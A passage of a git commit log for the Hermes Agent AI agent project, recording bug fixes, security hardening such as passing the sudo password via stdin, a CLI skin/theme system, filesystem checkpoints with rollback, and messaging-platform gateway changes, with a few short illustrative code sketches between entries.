   blinking in Kitty, ghostty, and some other terminals. Selection
   changes (↑/↓) still trigger instant repaints via key bindings.

2. Make sudo widget use dynamic _panel_box_width() instead of
   hardcoded border strings — adapts to terminal width on resize.

3. Cap response box borders at 120 columns so they don't wrap
   when switching from fullscreen to a narrower window.

Tests: 2857 passed.
2026-03-10 06:44:13 -07:00
teknium1
87af622df4 Merge PR #686: improve error handling and logging in code execution tool
Authored by @aydnOktay. Adds exc_info=True to exception logging, replaces
silent pass statements with logger.debug calls, fixes variable shadowing
in _kill_process_group nested except blocks.
2026-03-10 06:43:11 -07:00
teknium1
2c21c4b897 Merge PR #698: fix(security): pipe sudo password via stdin instead of shell cmdline
Authored by johnh4098. Fixes CWE-214: SUDO_PASSWORD was visible in
/proc/PID/cmdline via echo pipe. Now passed through subprocess stdin.
All 6 backends updated: local, ssh, docker, singularity pipe via stdin;
modal and daytona use printf fallback (remote sandbox, documented).
2026-03-10 06:38:44 -07:00
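
A sketch of the stdin-piping fix: the password travels through the process's stdin instead of appearing on the shell command line (and hence in /proc/PID/cmdline).

```python
import subprocess

def run_with_sudo(cmd: list, password: str) -> subprocess.CompletedProcess:
    # -S: read password from stdin; -p '': suppress the prompt text
    return subprocess.run(
        ["sudo", "-S", "-p", "", *cmd],
        input=password + "\n",
        text=True,
        capture_output=True,
    )
```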
teknium1
771969f747 fix: wire up enabled_tools in agent loop + simplify sandbox tool selection
Completes the fix started in 8318a51 — handle_function_call() accepted
enabled_tools but run_agent.py never passed it. Now both call sites in
_execute_tool_calls() pass self.valid_tool_names, so each agent session
uses its own tool list instead of the process-global
_last_resolved_tool_names (which subagents can overwrite).

Also simplifies the redundant ternary in code_execution_tool.py:
sandbox_tools is already computed correctly (intersection with session
tools, or full SANDBOX_ALLOWED_TOOLS as fallback), so the conditional
was dead logic.

Inspired by PR #663 (JasonOA888). Closes #662.
Tests: 2857 passed.
2026-03-10 06:35:28 -07:00
johnh4098
e9742e202f fix(security): pipe sudo password via stdin instead of shell cmdline 2026-03-10 06:34:59 -07:00
teknium1
a2ea85924a Merge PR #687: fix(file_tools): pass docker_volumes to sandbox container config
Authored by manuelschipper. Adds missing docker_volumes key to
container_config in file_tools.py, matching terminal_tool.py.
Without this, Docker sandbox containers created by file operations
lack user volume mounts when file tools run before terminal.
2026-03-10 06:33:30 -07:00
teknium1
8318a519e6 fix: pass enabled_tools through handle_function_call to avoid global race
The process-global _last_resolved_tool_names gets overwritten when
subagents resolve their own toolsets, causing execute_code in the
parent agent to generate imports for the wrong set of tools.

Fix: handle_function_call() now accepts an enabled_tools parameter.
run_agent.py already passes self.valid_tool_names at both call sites.
This change makes model_tools.py actually use it, falling back to the
global only when the caller doesn't provide a list (backward compat).
2026-03-10 06:32:08 -07:00
teknium1
8ef3c815e7 Merge PR #680: feat: add Nous Portal API key provider
Authored by Indelwin. Adds 'nous-api' provider for direct API key
access to Nous Portal inference, mirroring how OpenRouter and other
API-key providers work. Includes PROVIDER_REGISTRY entry, setup wizard
option, OPTIONAL_ENV_VARS, provider aliases, and test.
Fixes #644.
2026-03-10 06:31:03 -07:00
Indelwin
de07aa7c40 feat: add Nous Portal API key provider (#644)
Add support for using Nous Portal via a direct API key, mirroring
how OpenRouter and other API-key providers work. This gives users a
simpler alternative to the OAuth device-code flow when they already
have a Nous API key.

Changes:
- Add 'nous-api' to PROVIDER_REGISTRY as an api_key provider
  pointing to https://inference-api.nousresearch.com/v1
- Add NOUS_API_KEY and NOUS_BASE_URL to OPTIONAL_ENV_VARS
- Add NOUS_API_BASE_URL / NOUS_API_CHAT_URL to hermes_constants
- Add 'Nous Portal API key' as first option in setup wizard
- Add provider aliases (nous_api, nousapi, nous-portal-api)
- Add test for nous-api runtime provider resolution

Closes #644
2026-03-10 06:28:00 -07:00
teknium1
928bb16da1 fix: forward thread_id to Telegram adapter + update send_typing signatures
Part 2 of thread_id forum topic fix: add metadata param to
send_voice, send_image, send_animation, send_typing in Telegram
adapter and pass message_thread_id to all Bot API calls. Update
send_typing signature in Discord, Slack, WhatsApp, HomeAssistant
for compatibility.

Based on the fix proposed by @Bitstreamono in PR #656.
2026-03-10 06:26:32 -07:00
teknium1
441f498d6f Merge PR #679: fix(code_execution): handle empty enabled_sandbox_tools in schema description
Authored by 0xbyt4. Fixes broken 'from hermes_tools import , ...'
syntax in schema description when no sandbox tools are enabled.
Adds 29 new tests for schema generation, env var filtering,
edge cases, and interrupt handling.
2026-03-10 06:22:56 -07:00
teknium1
a630ca15de fix: forward thread_id metadata for Telegram forum topic routing
Replies in Telegram forum topics (supergroups with topics) now land in
the correct topic thread instead of 'General'.

- base.py: build thread_id metadata from event.source, pass to all
  send/media calls; add metadata param to send_typing, send_image,
  send_animation, send_voice, send_video, send_document, send_image_file,
  _keep_typing
- telegram.py: extract thread_id from metadata and pass as
  message_thread_id to all Bot API calls (send_photo, send_voice,
  send_audio, send_animation, send_chat_action)
- run.py: pass thread_id metadata to progress/streaming send calls
- discord/slack/whatsapp/homeassistant: update send_typing signature

Based on the fix proposed by @Bitstreamono in PR #656.
2026-03-10 06:21:15 -07:00
0xbyt4
52e3580cd4 refactor: merge new tests into test_code_execution.py
Move all new tests (schema, env filtering, edge cases, interrupt) into
the existing test_code_execution.py instead of a separate file.
Delete the now-redundant test_code_execution_schema.py.
2026-03-10 06:18:27 -07:00
0xbyt4
694a3ebdd5 fix(code_execution): handle empty enabled_sandbox_tools in schema description
build_execute_code_schema(set()) produced "from hermes_tools import , ..."
in the code property description — invalid Python syntax shown to the model.

This triggers when a user enables only the code_execution toolset without
any of the sandbox-allowed tools (e.g. `hermes tools code_execution`),
because SANDBOX_ALLOWED_TOOLS & {"execute_code"} = empty set.

Also adds 29 unit tests covering build_execute_code_schema, environment
variable filtering, execute_code edge cases, and interrupt handling.
2026-03-10 06:18:27 -07:00
teknium1
2a062e2f45 Merge PR #840: background process notification modes + fix spinner line spam
- feat(gateway): configurable background_process_notifications (off/result/error/all)
- fix(display): rate-limit spinner flushes to prevent line spam under patch_stdout

Background notifications inspired by @PeterFile (PR #593).
2026-03-10 06:17:18 -07:00
teknium1
49ec1c9e8f Merge PR #655: fix: normalize max turns config path
Authored by stablegenius49. Rebased onto current main, resolved 3
conflicts (load_config encoding, save_config commented sections, setup
default value), fixed missing MagicMock import, aligned DEFAULT_CONFIG
default to 90 (matching cli.py).

Migrates legacy root-level max_turns to agent.max_turns across all
config loaders (load_config, load_cli_config, save_config, setup).
Adds _normalize_max_turns_config() for consistent migration.
Fixes #634.
2026-03-10 06:05:20 -07:00
stablegenius49
4bd579f915 fix: normalize max turns config path 2026-03-10 06:05:02 -07:00
teknium1
e4adb67ed8 fix(display): rate-limit spinner flushes to prevent line spam under patch_stdout
The KawaiiSpinner animation would occasionally spam dozens of duplicate
lines instead of overwriting in-place with \r. This happened because
prompt_toolkit's StdoutProxy processes each flush() as a separate
run_in_terminal() call — when the write thread is slow (busy event loop
during long tool executions), each \r frame gets its own call, and the
terminal layout save/restore between calls breaks the \r overwrite
semantics.

Fix: rate-limit flush() calls to at most every 0.4s. Between flushes,
\r-frame writes accumulate in StdoutProxy's buffer. When flushed, they
concatenate into one string (e.g. \r frame1 \r frame2 \r frame3) and
are written in a single run_in_terminal() call where \r works correctly.

The spinner still animates (flush ~2.5x/sec) but each flush batches
~3 frames, guaranteeing the \r collapse always works. Most visible
with execute_code and terminal tools (3+ second executions).
2026-03-10 06:02:07 -07:00
teknium1
ff09cad879 Merge PR #621: fix: limit concurrent Modal sandbox creations to avoid deadlocks
Authored by voteblake.

- Semaphore limits concurrent Modal sandbox creations to 8 (configurable)
  to prevent thread pool deadlocks when 86+ tasks fire simultaneously
- Modal cleanup guard for failed init (prevents AttributeError)
- CWD override to /app for TB2 containers
- Add /home/ to host path validation for container backends
2026-03-10 05:57:54 -07:00
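
A sketch of the concurrency cap described above: a semaphore bounds how many sandbox creations run at once. The limit of 8 comes from the commit; the creation function is a placeholder.

```python
import threading

_CREATE_LIMIT = threading.Semaphore(8)  # configurable cap from the commit

def _really_create(spec: dict) -> dict:
    return {}  # stands in for the actual Modal sandbox creation

def create_sandbox(spec: dict) -> dict:
    with _CREATE_LIMIT:  # at most 8 threads creating sandboxes at once
        return _really_create(spec)
```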
teknium1
580e6ba2ff feat: add proper favicon and logo for landing page and docs site
Generated favicon files (ico, 16x16, 32x32, 180x180, 192x192, 512x512)
from the Hermes Agent logo. Replaces the inline SVG caduceus emoji with
real favicon files so Google's favicon service can pick up the logo.

Landing page: updated <link> tags to reference favicon.ico, favicon PNGs,
and apple-touch-icon.
Docusaurus: updated config to use favicon.ico and logo.png instead of
favicon.svg.
2026-03-10 05:51:45 -07:00
0xbyt4
ca23875575 fix: unify visibility filter in codex model discovery
_fetch_models_from_api checked for "hide" while _read_cache_models
checked for "hidden", causing models hidden by the API to still
appear when loaded from cache. Both now accept either value.
2026-03-10 15:15:33 +03:00
teknium1
d6d5a43d3a Merge PR #627: fix: continue non-tool replies after output-length truncation
Authored by tripledoublev (vincent). Rebased onto current main and
conflict-resolved.

When finish_reason='length' on a non-tool chat-completions response,
instead of rolling back and returning None, the agent now:
- Appends the truncated text and a continuation prompt
- Retries up to 3 times, accumulating partial chunks
- Concatenates all chunks into the final response
- Preserves existing rollback behavior for tool-call truncations
2026-03-10 04:33:14 -07:00
teknium1
d723208b1b Merge PR #617: Improve skills tool error handling
Authored by aydnOktay. Adds logging to skills_tool.py with specific
exception handling for file read errors (UnicodeDecodeError, PermissionError)
vs unexpected exceptions, replacing bare except-and-continue blocks.
2026-03-10 04:32:26 -07:00
vincent
b0a5fe8974 fix: continue after output-length truncation 2026-03-10 04:30:19 -07:00
teknium1
899dfdcfb9 Merge PR #616: fix: retry with rebuilt payload after compression
Authored by tripledoublev.

After context compression on 413/400 errors, the inner retry loop was
reusing the stale pre-compression api_messages payload. Fix breaks out
of the inner retry loop so the outer loop rebuilds api_messages from
the now-compressed messages list. Adds regression test verifying the
second request actually contains the compressed payload.
2026-03-10 04:22:42 -07:00
teknium1
8f0b07ed29 Merge PR #611: fix(session): atomic write for sessions.json to prevent data loss on crash
Authored by alireza78a.

Replaces open('w') + json.dump with tempfile.mkstemp + os.replace atomic
write pattern, matching the existing pattern in cron/jobs.py. Prevents
silent session loss if the process crashes or gets OOM-killed mid-write.

Resolved conflict: kept encoding='utf-8' from HEAD in the new fdopen call.
2026-03-10 04:18:53 -07:00
teknium1
f16f2912cf Merge PR #607: fix: reset all retry counters at start of run_conversation()
Authored by 0xbyt4. Adds missing resets for _incomplete_scratchpad_retries and _codex_incomplete_retries to prevent stale counters carrying over between CLI conversations.
2026-03-10 04:17:47 -07:00
teknium1
af748539f8 Merge PR #608: fix: remove unused imports and unnecessary f-strings
Authored by JackTheGit.

- Remove unused 'random' import from agent/display.py
- Remove unused 'Optional' import from agent/redact.py
- Remove unnecessary f-string prefixes in batch_runner.py
2026-03-10 04:16:23 -07:00
teknium1
695c017411 Merge PR #603: fix: return deny on approval callback timeout instead of None
Authored by 0xbyt4.

_approval_callback() had no return statement after the timeout break,
causing it to return None instead of 'deny'. Callers in approval.py
expect one of 'once', 'session', 'always', or 'deny'. This matches
the existing timeout behavior in approval.py:209.
2026-03-10 04:15:31 -07:00
teknium1
5e6c7bc205 Merge PR #602: fix: prevent data loss in clipboard PNG conversion when ImageMagick fails
Authored by 0xbyt4. Only deletes temp .bmp after confirmed successful conversion, restores original on failure. Adds 3 tests.
2026-03-10 04:15:05 -07:00
teknium1
e8cec55fad feat(gateway): configurable background process watcher notifications
Add display.background_process_notifications config option to control
how chatty the gateway process watcher is when using
terminal(background=true, check_interval=...) from messaging platforms.

Modes:
  - all:    running-output updates + final message (default, current behavior)
  - result: only the final completion message
  - error:  only the final message when exit code != 0
  - off:    no watcher messages at all

Also supports HERMES_BACKGROUND_NOTIFICATIONS env var override.

Includes 12 tests (5 config loading + 7 watcher behavior).

Inspired by @PeterFile's PR #593. Closes #592.
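Config sketch (key path per this commit; chosen value illustrative):

  display:
    background_process_notifications: result  # all | result | error | off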
2026-03-10 04:12:39 -07:00
teknium1
67fc6bc4e9 Merge PR #600: fix(security): use in-memory set for permanent allowlist save
Authored by alireza78a. Uses _permanent_approved directly instead of re-reading from disk, preventing potential data loss if a previous save failed.
2026-03-10 04:12:11 -07:00
teknium1
cbca0225f6 Merge PR #599: fix: strip MarkdownV2 italic markers in Telegram plaintext fallback
Authored by 0xbyt4.
2026-03-10 04:09:33 -07:00
teknium1
36ac91c902 Merge PR #598: feat(skill): expand duckduckgo-search with DDGS Python API coverage
Authored by areu01or00. Adds Python DDGS library examples for text, news, images, and video search with structured return field docs.
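The text variant looks roughly like this (duckduckgo_search API at time of
writing; exact signatures may differ across versions):

  from duckduckgo_search import DDGS

  with DDGS() as ddgs:
      for r in ddgs.text("hermes agent", max_results=5):
          print(r["title"], r["href"])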
2026-03-10 04:08:53 -07:00
teknium1
a2902fbad5 Merge PR #594: Improve TTS error handling and logging
Authored by aydnOktay. Adds specific exception handlers, ffmpeg return code checking, and exc_info logging to tts_tool.py.
2026-03-10 04:04:17 -07:00
teknium1
d03de749a1 fix: add themed hero art for all skins, fix triple-quote syntax
Each themed skin (ares, poseidon, sisyphus, charizard) now has custom
banner_hero art that replaces the default Hermes caduceus. The hero art
uses braille-dot patterns themed to each skin:
- Ares: shield/spear emblem in crimson/bronze
- Poseidon: trident with wave patterns in blue/seafoam
- Sisyphus: boulder on slope in grayscale
- Charizard: dragon silhouette in orange/ember

Also fixes triple-quote string termination that caused a syntax error
in the previous commit.
2026-03-10 03:54:12 -07:00
Dev User
c3dec1dcda fix(file_tools): pass docker_volumes to sandbox container config
file_tools.py creates its own Docker sandbox when read_file/search_files
runs before any terminal command. The container_config was missing
docker_volumes, so the sandbox had no user volume mounts — breaking
access to heartbeat state, cron output, and all other mounted data.

Matches the existing pattern in terminal_tool.py:872.

Missed in original PR #158 (feat: add docker_volumes config).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-10 10:18:33 +01:00
teknium1
4945240fc3 feat: add poseidon/sisyphus/charizard skins + banner logo support
Adds 3 new built-in skins (poseidon, sisyphus, charizard) with full
customization — colors, spinner faces/verbs/wings, branding text, and
custom ASCII art banner logos. Total: 7 built-in skins.

Also adds banner_logo and banner_hero fields to SkinConfig, allowing
any skin to replace the HERMES-AGENT ASCII art logo and the caduceus
hero art with custom artwork. The CLI now renders the skin's logo when
available, falling back to the default Hermes logo.

Skins with custom logos: ares, poseidon, sisyphus, charizard
Skins using default logo: default, mono, slate
2026-03-10 02:11:50 -07:00
JackTheGit
1db8609ac9 Fix several documentation typos 2026-03-10 08:10:16 +00:00
teknium1
f6bc620d39 fix: apply skin colors to local build_welcome_banner in cli.py
cli.py had a local copy of build_welcome_banner() that shadowed the
imported one from banner.py. This local copy had all colors hardcoded,
so /skin changes had no visible effect on the banner.

Now the local copy resolves skin colors at render time using
get_active_skin(), matching the banner.py behavior. All hardcoded
#FFD700/#CD7F32/#FFBF00/#B8860B/#FFF8DC/#8B8682 values in the local
function are replaced with skin-aware lookups.
2026-03-10 00:58:42 -07:00
teknium1
b4b46d1b67 docs: comprehensive skin/theme system documentation
- AGENTS.md: add Skin/Theme System section with architecture, skinnable
  elements table, built-in skins list, adding built-in/user skins guide,
  YAML example; add skin_engine.py to project structure; mention skin
  engine in CLI Architecture section
- CONTRIBUTING.md: add skin_engine.py to project structure; add 'Adding
  a Skin/Theme' section with YAML schema, activation instructions
- cli-config.yaml.example: add full skin config documentation with
  schema reference, built-in skins list, all color/spinner/branding keys
- docs/skins/example-skin.yaml: complete annotated skin template with
  all available fields and inline documentation
- hermes_cli/skin_engine.py: expand module docstring to full schema
  reference with all fields documented, usage examples, built-in skins
  list
2026-03-10 00:51:27 -07:00
teknium1
c1775de56f feat: filesystem checkpoints and /rollback command
Automatic filesystem snapshots before destructive file operations,
with user-facing rollback. Inspired by PR #559 (by @alireza78a).

Architecture:
- Shadow git repos at ~/.hermes/checkpoints/{hash}/ via GIT_DIR
- CheckpointManager: take/list/restore, turn-scoped dedup, pruning
- Transparent — the LLM never sees it, no tool schema, no tokens
- Once per turn — only first write_file/patch triggers a snapshot

Integration:
- Config: checkpoints.enabled + checkpoints.max_snapshots
- CLI flag: hermes --checkpoints
- Trigger: run_agent.py _execute_tool_calls() before write_file/patch
- /rollback slash command in CLI + gateway (list, restore by number)
- Pre-rollback snapshot auto-created on restore (undo the undo)

Safety:
- Never blocks file operations — all errors silently logged
- Skips root dir, home dir, dirs >50K files
- Disables gracefully when git not installed
- Shadow repo completely isolated from project git

Tests: 35 new tests, all passing (2798 total suite)
Docs: feature page, config reference, CLI commands reference
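The snapshot mechanism in rough form (paths and names illustrative; assumes
the shadow repo was initialized earlier with git init):

  import os, subprocess

  def take_checkpoint(shadow_dir: str, work_tree: str, label: str) -> None:
      env = {**os.environ, "GIT_DIR": shadow_dir, "GIT_WORK_TREE": work_tree}
      subprocess.run(["git", "add", "-A"], env=env, check=True)
      subprocess.run(["git", "commit", "--allow-empty", "-m", label],
                     env=env, check=True)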
2026-03-10 00:49:15 -07:00
teknium1
de6750ed23 feat: add data-driven skin/theme engine for CLI customization
Adds a skin system that lets users customize the CLI's visual appearance
through data files (YAML) rather than code changes. Skins define: color
palette, spinner faces/verbs/wings, branding text, and tool output prefix.

New files:
- hermes_cli/skin_engine.py — SkinConfig dataclass, built-in skins
  (default, ares, mono, slate), YAML loader for user skins from
  ~/.hermes/skins/, skin management API
- tests/hermes_cli/test_skin_engine.py — 26 tests covering config,
  built-in skins, user YAML skins, display integration

Modified files:
- agent/display.py — skin-aware spinner wings, faces, verbs, tool prefix
- hermes_cli/banner.py — skin-aware banner colors (title, border, accent,
  dim, text, session) via _skin_color()/_skin_branding() helpers
- cli.py — /skin command handler, skin init from config, skin-aware
  response box label and welcome message
- hermes_cli/config.py — add display.skin default
- hermes_cli/commands.py — add /skin to slash commands

Built-in skins:
- default: classic Hermes gold/kawaii
- ares: crimson/bronze war-god theme (from community PRs #579/#725)
- mono: clean grayscale
- slate: cool blue developer theme

User skins: drop a YAML file in ~/.hermes/skins/ with name, colors,
spinner, branding, and tool_prefix fields. Missing values inherit from
the default skin.
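A minimal user skin might look like this (top-level keys per this commit;
nesting and values illustrative):

  # ~/.hermes/skins/my-skin.yaml
  name: my-skin
  colors:
    title: "#00CED1"
  spinner:
    verbs: [pondering, tinkering]
  branding: "MY-AGENT"
  tool_prefix: ">>"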
2026-03-10 00:37:28 -07:00
teknium1
c0ffd6b704 feat: expand OpenClaw migration to cover all platform channels, provider keys, model/TTS config, shared skills, and daily memory
Adds 9 new migration categories to the OpenClaw-to-Hermes migration script:

Platform channels (non-secret, in user-data preset):
- discord-settings: bot token + allowlist → .env
- slack-settings: bot/app tokens + allowlist → .env
- whatsapp-settings: allowlist → .env
- signal-settings: account, HTTP URL, allowlist → .env

Configuration:
- model-config: default model → config.yaml
- tts-config: TTS provider/voice settings → config.yaml tts.*

Data:
- shared-skills: ~/.openclaw/skills/ → ~/.hermes/skills/openclaw-imports/
- daily-memory: workspace/memory/*.md entries → merged into MEMORY.md

Secrets (full preset only, requires --migrate-secrets):
- provider-keys: OpenRouter/OpenAI/Anthropic API keys, ElevenLabs/OpenAI TTS keys

Bug fix: workspace-agents now records 'skipped' status when source is
missing instead of silently returning (invisible failure in reports).

Total migration options: 10 → 19
Tests: 14 → 24 (10 new tests covering all new categories)
Full suite: 2798 passed, 0 failures
2026-03-10 00:35:14 -07:00
teknium1
8b9de366f2 Merge PR #570: feat: OpenClaw migration skill + CLI panel width improvements
Authored by unmodeled-tyler. Adds openclaw-migration skill to optional-skills/
with migration script, SKILL.md, and 7 tests. Also improves clarify/approval
panel rendering with dynamic width calculation.
2026-03-10 00:06:40 -07:00
teknium1
60d3f79c72 Merge PR #565: fix: sanitize FTS5 queries and close mirror DB connections
Authored by 0xbyt4. Fixes #N/A (no linked issue).

- Sanitize user input before FTS5 MATCH to prevent OperationalError on
  special characters (C++, unbalanced quotes, dangling operators, etc.)
- Close SessionDB connection in mirror._append_to_sqlite() via finally block
- Added tests for both fixes
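One standard approach is to quote every token as an FTS5 string literal
(sketch; the shipped sanitizer may differ):

  def sanitize_fts5(user_query: str) -> str:
      # Double embedded quotes, then wrap each token so operators,
      # 'C++', and unbalanced quotes are matched literally.
      tokens = user_query.split()
      return " ".join('"{}"'.format(t.replace('"', '""')) for t in tokens)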
2026-03-09 23:59:26 -07:00
teknium1
6f3a673aba fix: restore success-path server_sock.close() before rpc_thread.join()
PR #568 moved the close entirely to the finally block, but the success-path
close is needed to break the RPC thread out of accept() immediately. Without
it, rpc_thread.join(3) may block for up to 3 seconds if the child process
never connected. The finally-block close remains as a safety net for the
exception/error path (the actual fd leak fix).
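Resulting shape (simplified; closing an already-closed Python socket object
is a no-op, so the double close is safe):

  try:
      wait_for_child(server_sock)  # names illustrative
      server_sock.close()   # success path: breaks the RPC thread out of accept()
      rpc_thread.join(3)    # returns promptly instead of hitting the timeout
  finally:
      server_sock.close()   # safety net for the exception/error path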
2026-03-09 23:40:20 -07:00
teknium1
ab6a6338c4 Merge PR #568: fix(code-execution): close server socket in finally block to prevent fd leak
Authored by alireza78a. Moves server_sock.close() into the finally block so
the socket fd is always cleaned up, even if an exception occurs between socket
creation and the success-path close.
2026-03-09 23:39:13 -07:00
teknium1
1ec8c1fcaa Merge PR #564: fix: count actual tool calls instead of tool-related messages
Authored by 0xbyt4. Fixes tool_call_count double-counting tool responses
and under-counting parallel tool calls.
2026-03-09 23:32:54 -07:00
teknium1
739eb6702e Merge PR #551: Make skill file writes atomic
Authored by aydnOktay. Adds _atomic_write_text() helper using tempfile.mkstemp()
+ os.replace() to prevent skill file corruption on crash/interrupt. All 7
write_text() calls in skill_manager_tool.py converted, including rollback writes
during security scans.
2026-03-09 23:31:43 -07:00
teknium1
1aa7badb3c fix: add missing Platform.SIGNAL to toolset mappings, update test + config docs
Platform.SIGNAL was missing from default_toolset_map and platform_config_key
in gateway/run.py, causing Signal to silently fall back to hermes-telegram
toolset (same bug as HomeAssistant, fixed in PR #538).

Also updates:
- tests/test_toolsets.py: include hermes-signal and hermes-homeassistant in
  the platform core-tools consistency check
- cli-config.yaml.example: document signal and homeassistant platform keys
2026-03-09 23:27:19 -07:00
teknium1
ee4008431a fix: stop terminal border flashing with steady cursor and TUI spinner widget
Cherry-picked and improved from PR #470 (fixes #464).

Problem: On Ubuntu 24.04 with ghostty + tmux, the prompt input box
border lines flash due to cursor blink and raw spinner terminal writes
conflicting with prompt_toolkit's rendering.

Changes:
- cli.py: Add CursorShape.BLOCK to Application() to disable cursor blink
- cli.py: Add thinking_callback + spinner_widget in TUI layout so
  thinking status displays as a proper prompt_toolkit widget instead of
  raw terminal writes that conflict with the TUI renderer
- run_agent.py: Add thinking_callback parameter to AIAgent; when set,
  uses the callback instead of KawaiiSpinner for thinking display

What was NOT changed (preserving existing behavior):
- agent/display.py: Untouched. KawaiiSpinner _write() stdout capture,
  _animate() logic, and 0.12s frame interval all preserved. This
  protects subagent stdout redirection and keeps smooth animations
  for non-CLI contexts (gateway, batch runner).
- Original emoji spinner types (brain/sparkle/pulse/moon/star) preserved
  for all non-CLI contexts.

Fixes from original PR #470:
- CursorShape.STEADY_BLOCK -> CursorShape.BLOCK (STEADY_BLOCK doesn't
  exist in prompt_toolkit 3.0.52)
- Removed duplicate self._spinner_text = '' line
- Removed redundant nested if-checks

Tested: 2706 tests pass, interactive CLI verified via tmux.
2026-03-09 23:26:43 -07:00
teknium1
88f8bcde38 Merge PR #538: fix cron HERMES_HOME path mismatch, missing HomeAssistant toolset mapping, Daytona timeout drift
Authored by Himess. Three independent fixes:
- cron/jobs.py: respect HERMES_HOME env var (consistent with scheduler.py)
- gateway/run.py: add Platform.HOMEASSISTANT to toolset mappings
- tools/environments/daytona.py: use time.monotonic() for timeout deadline
2026-03-09 23:20:52 -07:00
teknium1
2285615010 Merge PR #533: fix: use regex for search output parsing to handle Windows drive-letter paths
Authored by Himess. Replaces split(':', 2) with a regex that optionally
captures a Windows drive-letter prefix in rg/grep output parsing. Fixes
search_files returning zero results on Windows where paths like
C:\path\file.py:42:content were misparsed by naive colon splitting.
No behavior change on Unix/Mac.
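A regex along these lines covers both cases (sketch, not the exact shipped
pattern):

  import re

  # optional Windows drive letter, then path:line:content
  LINE_RE = re.compile(r"^([A-Za-z]:[^:]*|[^:]+):(\d+):(.*)$")

  m = LINE_RE.match(r"C:\path\file.py:42:content")
  path, lineno, content = m.group(1), int(m.group(2)), m.group(3)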
2026-03-09 23:18:42 -07:00
teknium1
805ce8177b Merge PR #529: fix: restrict .env file permissions to owner-only
Authored by Himess. Adds 0600 chmod on ~/.hermes/.env after writing API keys,
matching the existing pattern in auth.py for auth.json.
2026-03-09 23:10:59 -07:00
teknium1
bdce33e239 Merge PR #810: fix(cli): handle unquoted multi-word session names in -c/--continue and -r/--resume 2026-03-09 23:08:45 -07:00
Teknium
9be8d88ccc Merge pull request #815 from NousResearch/hermes/hermes-5ab2a29e
Add hermes-atropos-environments bundled skill
2026-03-09 23:06:19 -07:00
teknium1
6ab3ebf195 Add hermes-atropos-environments skill (bundled)
Add comprehensive skill for building, testing, and debugging Hermes Agent
RL environments for Atropos training. Includes:

- SKILL.md: Full guide covering HermesAgentBaseEnv interface, required
  methods, config class, CLI modes (serve/process/evaluate), reward
  function patterns, common pitfalls, and minimum implementation checklist
- New 'Inference Setup' section: instructs the agent to always ask the
  user for their inference provider (OpenRouter + model choice, self-hosted
  VLLM endpoint, or other OpenAI-compatible API) before running tests
- references/agentresult-fields.md: AgentResult dataclass field reference
- references/atropos-base-env.md: Atropos BaseEnv API reference
- references/usage-patterns.md: Step-by-step patterns for process,
  evaluate, serve, and smoke test modes

Will be auto-synced to ~/.hermes/skills/ via skills_sync.
2026-03-09 23:04:17 -07:00
teknium1
0a628c1aef fix(cli): handle unquoted multi-word session names in -c/--continue and -r/--resume
When a user runs `hermes -w -c Pokemon Agent Dev` without quoting the
session name, argparse would fail with:
  error: argument command: invalid choice: 'Agent'

This is because argparse parses `-c Pokemon` (consuming one token via
nargs='?'), then sees 'Agent' and tries to match it as a subcommand.

Fix: add _coalesce_session_name_args() that pre-processes sys.argv before
argparse, joining consecutive non-flag, non-subcommand tokens after -c or
-r into a single argument. This makes both quoted and unquoted multi-word
session names work transparently.

Includes 17 tests covering all edge cases: multi-word names, single-word,
bare flags, flag ordering, subcommand boundaries, and passthrough.
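Schematically (simplified; the real flag and subcommand sets live in the CLI):

  def coalesce_session_name(argv, subcommands):
      out, i = [], 0
      while i < len(argv):
          out.append(argv[i])
          if argv[i] in ("-c", "--continue", "-r", "--resume"):
              j, words = i + 1, []
              while (j < len(argv) and not argv[j].startswith("-")
                     and argv[j] not in subcommands):
                  words.append(argv[j])
                  j += 1
              if words:
                  out.append(" ".join(words))
                  i = j - 1
          i += 1
      return out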
2026-03-09 21:36:29 -07:00
teknium1
36328a996f Merge PR #458: Add explicit UTF-8 encoding to config/data file I/O
Authored by shitcoinsherpa. Adds encoding='utf-8' to all text-mode
open() calls in gateway/run.py, gateway/config.py, hermes_cli/config.py,
hermes_cli/main.py, and hermes_cli/status.py. Prevents encoding errors
on Windows where the default locale is not UTF-8.

Also fixed 4 additional open() calls in gateway/run.py that were added
after the PR branch was created.
2026-03-09 21:19:20 -07:00
shitcoinsherpa
4bc32dc0f1 Fix password reader for Windows using msvcrt.getwch()
The existing password prompt uses /dev/tty and termios to read input
with echo disabled. Neither exists on Windows.

On Windows, msvcrt.getwch() reads a single character from the console
without echoing it. This adds a Windows code path that uses getwch()
in a loop, collecting characters until Enter is pressed.

The Unix path using termios and /dev/tty is unchanged.
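The Windows branch, roughly (msvcrt is standard library, Windows-only;
function name illustrative):

  import msvcrt

  def _read_password_windows(prompt: str = "Password: ") -> str:
      print(prompt, end="", flush=True)
      chars = []
      while True:
          ch = msvcrt.getwch()    # one character, no echo
          if ch in ("\r", "\n"):  # Enter ends input
              print()
              return "".join(chars)
          chars.append(ch)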
2026-03-09 21:15:59 -07:00
teknium1
4de5e017f1 Merge PR #457: Use pywinpty for PTY support on Windows
Authored by shitcoinsherpa. Imports winpty.PtyProcess on Windows instead
of ptyprocess.PtyProcess, and adds platform markers to the [pty] extra
so the correct package is installed automatically.
2026-03-09 21:09:56 -07:00
teknium1
3e352f8a0d fix: add upstream guard for non-dict function_args + tests for build_tool_preview
Complements PR #453 by 0xbyt4. Adds isinstance(dict) guard in
run_agent.py to catch cases where json.loads returns non-dict
(e.g. null, list, string) before they reach downstream code.

Also adds 15 tests for build_tool_preview covering None args,
empty dicts, known/unknown tools, fallback keys, truncation,
and all special-cased tools (process, todo, memory, session_search).
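The guard amounts to something like (names illustrative):

  args = json.loads(raw_arguments or "{}")
  if not isinstance(args, dict):  # json.loads can yield None, list, str, int
      args = {}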
2026-03-09 21:01:40 -07:00
teknium1
28ae5db9b0 Merge PR #453: fix: handle None args in build_tool_preview
Authored by 0xbyt4. Adds defensive guard for None/empty args in
build_tool_preview() to prevent crashes when a model returns null
tool call arguments.
2026-03-09 20:58:34 -07:00
teknium1
d5811c887a Merge: fix double judge call + eval buffer pollution in WebResearchEnv 2026-03-09 20:57:54 -07:00
teknium1
975fd86dc4 fix: eliminate double LLM judge call and eval buffer pollution
evaluate() was calling _llm_judge twice per item (once via
compute_reward, once directly) — double the API cost for no benefit.
Now extracts correctness from compute_reward's buffer instead.

Also: compute_reward appends to training metric buffers during eval,
which would pollute wandb training charts. Now rolls back buffer
entries added during eval so training metrics stay clean.
2026-03-09 20:57:46 -07:00
teknium1
0ff7fe3ee2 Merge PR #439: docs: fix spelling of 'publicly'
